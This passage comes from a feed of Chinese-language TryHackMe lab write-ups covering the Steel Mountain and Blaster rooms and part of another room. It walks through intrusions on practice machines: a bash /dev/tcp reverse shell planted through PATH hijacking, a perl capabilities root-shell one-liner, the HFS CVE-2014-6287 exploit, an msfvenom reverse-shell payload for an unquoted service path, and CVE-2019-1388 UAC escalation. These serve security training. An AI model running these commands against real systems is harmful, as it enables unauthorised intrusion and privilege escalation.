&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3de56-ZXCPLk5.png"&gt;&lt;/li&gt;
&lt;li&gt;會發現是一個叫做 &lt;code&gt;hatter&lt;/code&gt; 的使用者關於逆向這個程式，很明顯的重點就是以下三行- &lt;code&gt;setuid(0x3eb);&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;setgid(0x3eb);&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;system(&amp;quot;/bin/echo -n \'Probably by \' &amp;amp;&amp;amp; date --date=\'next hour\' -R&amp;quot;);&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;然後他的 &lt;code&gt;Segmentation fault&lt;/code&gt; 是假的7777777777777777777我們可以發現他的 system 裡面主要 call 了兩個東西- 第一個是 &lt;code&gt;/bin/echo&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;第二個是 &lt;code&gt;date&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;在這邊我先查詢了 &lt;code&gt;/bin/echo&lt;/code&gt; 以及 &lt;code&gt;/bin/date&lt;/code&gt; 發現都不可以修改想到我們可以做什麼事情了嗎?- 程式裡面的 &lt;code&gt;system&lt;/code&gt; 呼叫的是 &lt;code&gt;date&lt;/code&gt; 而不是 &lt;code&gt;/bin/date&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;而在 Linux 中，如果不寫完整的路徑，就會去&lt;code&gt;$PATH&lt;/code&gt;裡面抓&lt;/li&gt;
&lt;li&gt;所以我們可以修改 &lt;code&gt;$PATH&lt;/code&gt; ，增加路徑，並放上我們自己ㄉ &lt;code&gt;date&lt;/code&gt; 檔案放一個 reverse shell&lt;code&gt;/bin/bash -c '/bin/bash -i &amp;gt;&amp;amp; /dev/tcp/10.13.21.55/7877 0&amp;gt;&amp;amp;1'&lt;/code&gt;再給他權限- &lt;code&gt;chmod +x date&lt;/code&gt;攻擊機準備好 reverse shell- &lt;code&gt;nc -vlk 7877&lt;/code&gt;再輸入以下指令- &lt;code&gt;PATH=/home/rabbit:$PATH ./teaParty&lt;/code&gt;就可以收到 reverse shell 了!!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/67027-ZZ9wpv0.png"&gt;&lt;/li&gt;
&lt;li&gt;我們目前到了 &lt;code&gt;hatter&lt;/code&gt; 使用者&lt;/li&gt;
&lt;li&gt;在根目錄可以發現一組 &lt;code&gt;WhyIsARavenLikeAWritingDesk?&lt;/code&gt; 密碼，可以以此用 ssh 登入 hatter&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ssh hatter@10.10.166.15&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;先透過 scp 把 linpeas 給傳到機器中&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a70ee-2Qlr3yo.png"&gt;輸入 &lt;code&gt;bash linpeas.sh&lt;/code&gt;- 發現一些有趣的東西在 &lt;code&gt;Capabilities&lt;/code&gt; 的地方可以看到- Files with capabilities&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/57684-hPtNFxo.png"&gt;&lt;/li&gt;
&lt;li&gt;發現 perl 有 &lt;code&gt;cap_setuid&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;去 &lt;a href="https://gtfobins.github.io/"&gt;GTFObins&lt;/a&gt; 上找就找到了 GTFObins 上面的 &lt;a href="https://gtfobins.github.io/gtfobins/perl/#capabilities"&gt;perl Capabilities&lt;/a&gt;- &lt;code&gt;perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec &amp;quot;/bin/sh&amp;quot;;'&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/25e63-bveY1BS.png"&gt;&lt;/li&gt;
&lt;li&gt;就發現了我們拿到 root !!也就順利的拿到了 root 的 flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6d47d-aSVKD2j.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}&lt;/code&gt;到 /root 看看有什麼東西- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d55ea-HFeDVn0.png"&gt;&lt;/li&gt;
&lt;li&gt;找到了 &lt;code&gt;user.txt``thm{&amp;quot;Curiouser and curiouser!&amp;quot;}&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;del&gt;把user.txt放在root目錄是不是搞錯了什麼&lt;/del&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Steel Mountain (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/05/steel-mountain-try-hack-me-writeup/</link><pubDate>Thu, 05 Aug 2021 13:24:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/05/steel-mountain-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/steelmountain"&gt;https://tryhackme.com/room/steelmountain&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.27.172&lt;/p&gt;
&lt;h2 id="scan"&gt;Scan&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;rustscan -a 10.10.27.172&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cffee-tvomY1S.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;nmap -A 10.10.27.172&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 01:58 EDT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap scan report for 10.10.27.172
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host is up (0.27s latency).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Not shown: 989 closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;PORT STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;80/tcp open http Microsoft IIS httpd 8.5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| http-methods:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ Potentially risky methods: TRACE
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-server-header: Microsoft-IIS/8.5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: Site doesn&amp;#39;t have a title (text/html).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;135/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;139/tcp open netbios-ssn Microsoft Windows netbios-ssn
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;3389/tcp open ssl/ms-wbt-server?
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| ssl-cert: Subject: commonName=steelmountain
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Not valid before: 2021-08-04T05:45:04
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_Not valid after: 2022-02-03T05:45:04
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ssl-date: 2021-08-05T05:59:31+00:00; 0s from scanner time.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;8080/tcp open http HttpFileServer httpd 2.3
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-server-header: HFS 2.3
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: HFS /
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49152/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49153/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49154/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49155/tcp open unknown
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49156/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host script results:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: , NetBIOS MAC: 02:5d:12:51:16:37 (unknown)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| account_used:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| authentication_level: user
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| challenge_response: supported
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ message_signing: disabled (dangerous, but default)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb2-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| 2.02:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ Message signing enabled but not required
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb2-time:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| date: 2021-08-05T05:59:18
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ start_date: 2021-08-05T05:44:25
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap done: 1 IP address (1 host up) scanned in 90.76 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;觀察首頁http://10.10.27.172/&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9cfb8-B9oU5Rr.png"&gt;&lt;/li&gt;
&lt;li&gt;有一個 Employee of the month圖片網址 http://10.10.27.172/img/BillHarper.pngWho is the employee of the month?- &lt;code&gt;Bill Harper&lt;/code&gt;Scan the machine with nmap. What is the other port running a web server on?- 8080Take a look at the other web server. What file server is running?- 透過 NMAP 可以發現 HttpFileServer&lt;/li&gt;
&lt;li&gt;公司叫做 rejetto&lt;/li&gt;
&lt;li&gt;所以答案 &lt;code&gt;Rejetto Http File Server&lt;/code&gt;HFS 的版本 &lt;code&gt;2.3&lt;/code&gt; 可以找到有一個CVE- &lt;a href="https://www.exploit-db.com/exploits/39161"&gt;https://www.exploit-db.com/exploits/39161&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;CVE-2014-6287&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="exploit"&gt;Exploit&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;下載檔案到 kali&lt;code&gt;wget https://www.exploit-db.com/download/39161 -O 39161.py&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;修改內部的 ip 及 port&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ip_addr = &amp;quot;10.13.21.55&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;local_port = &amp;quot;7878&amp;quot;&lt;/code&gt;這邊的 port 是指 reverse shell 的port另外依照 exploit 需求，需要在攻擊機 80 port 開一個 webserver，並在根目錄放一個 &lt;code&gt;nc.exe&lt;/code&gt;- &lt;code&gt;nc.exe&lt;/code&gt; 可以從這邊取得https://github.com/int0x33/nc.exe/blob/master/nc.exe&lt;code&gt;sudo python3 -m http.server 80&lt;/code&gt;- 使用 python 開啟 80 port 的 webserver並於本地端開啟 nc 監聽- &lt;code&gt;nc -l 7877&lt;/code&gt;執行 exploit- &lt;code&gt;python 39161.py 10.10.27.172 8080&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d6bd5-DZRh2qx.png"&gt;就可以收到 shell ㄌ!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/57bd7-gDf00JU.png"&gt;&lt;/li&gt;
&lt;li&gt;使用 &lt;code&gt;whoami&lt;/code&gt; 確認使用者名稱&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7995e-b5RWX79.png"&gt;在使用者的桌面找到 user flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a5b67-kPPBKKU.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b04763b6fcf51fcd7c13abc7db4fd365&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="觀察提權資訊"&gt;觀察提權資訊&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;輸入 &lt;code&gt;systeminfo&lt;/code&gt; 可以觀察到&lt;code&gt;Microsoft Windows Server 2012 R2 Datacenter&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cfe36-rOMp0al.png"&gt;下載 WinPeas.exe 進行掃描- &lt;code&gt;powershell -c wget http://10.13.21.55:8000/winPEASx64.exe -outFile winPEASx64.exe&lt;/code&gt;執行 Winpeas 發現有可疑ㄉ引號路徑漏洞- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d9f31-e0xm9JH.png"&gt;觀察 Services- 可以輸入 &lt;code&gt;powershell -c Get-Service&lt;/code&gt; 觀察目前的所有 Services&lt;/li&gt;
&lt;li&gt;WinPeas 也已經很好心的告訴我們是 &lt;code&gt;AdvancedSystemCareService9&lt;/code&gt; 了確認檔案與 Services 的權限- 先準備 &lt;a href="https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk"&gt;https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk&lt;/a&gt; 在攻擊機&lt;/li&gt;
&lt;li&gt;&lt;code&gt;powershell -c wget http://10.13.21.55:8000/accesschk.exe -outFile accesschk.exe&lt;/code&gt;觀察 Services 權限- &lt;code&gt;accesschk.exe /accepteula -ucqv AdvancedSystemCareService9&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/450e8-gmO6qI7.png"&gt;&lt;/li&gt;
&lt;li&gt;可以發現我們的使用者 bill&lt;/li&gt;
&lt;li&gt;可以幫 services&lt;code&gt;Start&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Stop&lt;/code&gt;觀察檔案權限- &lt;code&gt;accesschk -uwdq &amp;quot;C:\Program Files (x86)\&amp;quot;&lt;/code&gt;可以看到我們沒有權限&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/478fd-3X20RSe.png"&gt;&lt;code&gt;accesschk -uwdq &amp;quot;C:\Program Files (x86)\IoBit&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c656b-9yC2NTI.png"&gt;&lt;/li&gt;
&lt;li&gt;發現我們有 RW 權限!!透過 msfevon 產出一個 reverse shell- &lt;code&gt;msfevon -p windows/x64_shell_reverse_tcp LHOST=10.13.21.55 LPORT=8877 -f exe -a Advanced.exe&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c7697-5lMroiV.png"&gt;下載檔案並放置到 &lt;code&gt;C:\Program Files (x86)&lt;/code&gt;- &lt;code&gt;powershell -c wget http://10.13.21.55:8000/Advanced.exe -outFile Advanced.exe&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c8151-7FIBZMQ.png"&gt;&lt;/li&gt;
&lt;li&gt;準備 reverse shell 監聽&lt;code&gt;nc -vlk 8877&lt;/code&gt;觀察 services- &lt;code&gt;sc qc AdvancedSystemCareService9&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6deb1-tgYWwGx.png"&gt;qc : Query system config停止 services- &lt;code&gt;sc stop AdvancedSystemCareService9&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/44b14-dSdNw65.png"&gt;重啟 services- &lt;code&gt;sc start AdvancedSystemCareService9&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ac690-a9x5ekb.png"&gt;&lt;/li&gt;
&lt;li&gt;會發現畫面卡住，因為我們的 reverse sehll 已經接上了!!&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/daaf6-AneRNlp.png"&gt;取得 root flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/bf48b-G8cXc1F.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9af5f314f57607c00fd09803a587db80&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Blaster (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/04/blaster-try-hack-me-writeup/</link><pubDate>Wed, 04 Aug 2021 23:52:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/04/blaster-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/blaster"&gt;https://tryhackme.com/room/blaster&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP: 10.10.188.122&lt;/p&gt;
&lt;p&gt;先寫在前面，這一題初學者不建議打，官方的影片跟 Writeup 都不完全適用，可能是作者重新 Deploy 過題目或是做過一些升級，所以整題難度高了非常多 QQ&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;老梗 &lt;code&gt;nmap -A 10.10.188.122&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3da4d-RZvanHI.png"&gt;&lt;/li&gt;
&lt;li&gt;發現有開兩個 port80&lt;/li&gt;
&lt;li&gt;3389How many ports are open on our target system?- 2Looks like there&amp;rsquo;s a web server running, what is the title of the page we discover when browsing to it?- nmap 就告訴我們ㄌ&lt;/li&gt;
&lt;li&gt;&lt;code&gt;IIS Windows Server&lt;/code&gt;Interesting, let&amp;rsquo;s see if there&amp;rsquo;s anything else on this web server by fuzzing it. What hidden directory do we discover?- 預設的 &lt;code&gt;dirsearch&lt;/code&gt; 找不到東西&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3c389-STu7dF0.png"&gt;這邊我用了 &lt;code&gt;dirb&lt;/code&gt; 的 &lt;code&gt;big&lt;/code&gt; Wordlist- &lt;code&gt;python3 dirsearch.py -u http://10.10.188.122 -e all -w /usr/share/dirb/wordlists/big.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a4f50-AMoCMh4.png"&gt;&lt;/li&gt;
&lt;li&gt;掃到ㄌ http://10.10.188.122/retro/透過 Wappalyzer 可以觀察到- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/73e12-hCmTpBu.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/edf4d-XX4DVBz.png"&gt;&lt;/li&gt;
&lt;li&gt;他是一個 WordpressNavigate to our discovered hidden directory, what potential username do we discover?- Po 文者都是 &lt;code&gt;Wade&lt;/code&gt;Crawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover?- 發現一篇文章&lt;code&gt;Ready Player One I can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie!&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;他說他最喜歡的書是 &lt;code&gt;Ready Player One&lt;/code&gt; (一級玩家)&lt;/li&gt;
&lt;li&gt;他的名字跟主角很像，主角是 &lt;code&gt;Wade Owen Watts&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;然後他說他常常在登入時打錯他的 avatar抱歉我英文不好，查了之後才知道&lt;code&gt;avatar : （網路遊戲或網路聊天室中的）虛擬化身&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;所以應該是電影裡面的角色名稱在這邊查詢 &lt;code&gt;https://hero.fandom.com/wiki/Parzival_(Ready_Player_One)&lt;/code&gt;- 可以找到 &lt;code&gt;Wade Owen Watts, under the virtual name Parzival&lt;/code&gt;所以他的密碼是 &lt;code&gt;parzival&lt;/code&gt;- 大小寫都 try 了一次，發現是全小寫&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="rdp"&gt;RDP&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;透過 RDP 登入遠端系統&lt;code&gt;xfreerdp +drives /u:Wade /v:10.10.151.248:3389&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;使用密碼 &lt;code&gt;parzival&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;即可順利登入&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/30163-Jf6GS9P.png"&gt;取得 user flag- &lt;code&gt;THM{HACK_PLAYER_ONE}&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/837a7-OctDXza.png"&gt;開始工具列搜尋 &lt;code&gt;system infomation&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/da0e3-DjCfuSY.png"&gt;&lt;/li&gt;
&lt;li&gt;可以看到作業系統的版本等資訊嘗試使用 winPEAS 來搜可以提權的點- powershell &lt;code&gt;wget http://10.13.21.55:8000/winPEAS.bat -outfile winPEAS.bat&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c9b1d-hQCZjBk.png"&gt;有 Defender 把我吃掉ㄌ QQQQ這邊依照官方的Writeup 以及教學，理論上可以在 IE 的瀏覽紀錄上找到一些蛛絲馬跡- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8479e-SPVazkE.png"&gt;&lt;/li&gt;
&lt;li&gt;但我這邊看到基本上是空的QQQQ&lt;/li&gt;
&lt;li&gt;好吧，那就當作這題是困難版的，繼續嘗試&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="可疑的檔案"&gt;可疑的檔案&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;在桌面上找到 &lt;code&gt;hhupd.exe&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/214f9-51pZngN.png"&gt;直接丟去 Google 就會看到- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9f566-44Ojajv.png"&gt;CVE-2019-1388 提權When enumerating a machine, it&amp;rsquo;s often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?- 完成正規解可以在瀏覽器蛛絲馬跡上找到的答案QQ&lt;/li&gt;
&lt;li&gt;&lt;code&gt;CVE-2019-1388&lt;/code&gt;Looks like an executable file is necessary for exploitation of this vulnerability and the user didn&amp;rsquo;t really clean up very well after testing it. What is the name of this executable?- 桌面上的檔案 &lt;code&gt;hhupd&lt;/code&gt;透過觀察網路上的資源- &lt;a href="https://github.com/jas502n/CVE-2019-1388"&gt;https://github.com/jas502n/CVE-2019-1388&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;可以發現 CVE-2019-1388 是一個很酷ㄉ洞，基本實作細節如下1. 對著 &lt;code&gt;hhupd&lt;/code&gt; 點兩下&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/24553-XkwHyEL.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ol start="2"&gt;
&lt;li&gt;跳出 UAC 後，選 show more details- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9ed52-dtuDTnO.png"&gt;&lt;/li&gt;
&lt;li&gt;選擇 &lt;code&gt;Show infomation about the publisher's certificate&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d5b23-LJZMN3W.png"&gt;&lt;/li&gt;
&lt;li&gt;點選 Issued by: 後面的超連結- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5aff2-9VoaaDW.png"&gt;&lt;/li&gt;
&lt;li&gt;這個時候畫面還是顯示憑證資訊，我們可以按 OK 先關掉&lt;/li&gt;
&lt;li&gt;再按 No 關閉 UAC&lt;/li&gt;
&lt;li&gt;這個時候出現的 IE，而這個IE就是以 system 權限跑起來的- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3df76-cXh7MGi.png"&gt;&lt;/li&gt;
&lt;li&gt;我們可以按下 ctrl + s 把網頁存檔，目的主要是為了叫出存檔的框框&lt;/li&gt;
&lt;li&gt;這個時候會跳出一個錯誤，不重要，直接按下 OK- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c88af-NBmKhd5.png"&gt;&lt;/li&gt;
&lt;li&gt;在上方路徑處輸入 &lt;code&gt;cmd&lt;/code&gt; 或 &lt;code&gt;C:\Windows\System32\cmd.exe&lt;/code&gt; 並按下 Enter- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/83632-z4jjJct.png"&gt;&lt;/li&gt;
&lt;li&gt;會跳出一個 cmd 框框，而且是用 system 權限執行起來的- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d3745-YEuzHEM.png"&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;提權完成Now that we&amp;rsquo;ve spawned a terminal, let&amp;rsquo;s go ahead and run the command &amp;lsquo;whoami&amp;rsquo;. What is the output of running this?- &lt;code&gt;nt authority\system&lt;/code&gt;接下來就可以到 admin 資料夾的桌面領 root flag ㄌ- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e1c59-DyvTkgT.png"&gt;Now that we&amp;rsquo;ve confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator&amp;rsquo;s desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four!- &lt;code&gt;THM{COIN_OPERATED_EXPLOITATION}&lt;/code&gt;&lt;/p&gt;</description></item><item><title>Dogcat (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/02/dogcat-try-hack-me-writeup/</link><pubDate>Mon, 02 Aug 2021 23:59:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/02/dogcat-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/dogcat"&gt;https://tryhackme.com/room/dogcat&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP: 10.10.221.153&lt;br&gt;
第一次打 Medium 的題目&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;先用老梗 &lt;code&gt;nmap -A 10.10.221.153&lt;/code&gt;發現只有開 80 跟 22dirsearch- 發現基本上都沒有東西 QQ&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="瀏覽器亂逛"&gt;瀏覽器亂逛&lt;/h2&gt;
&lt;ul&gt;
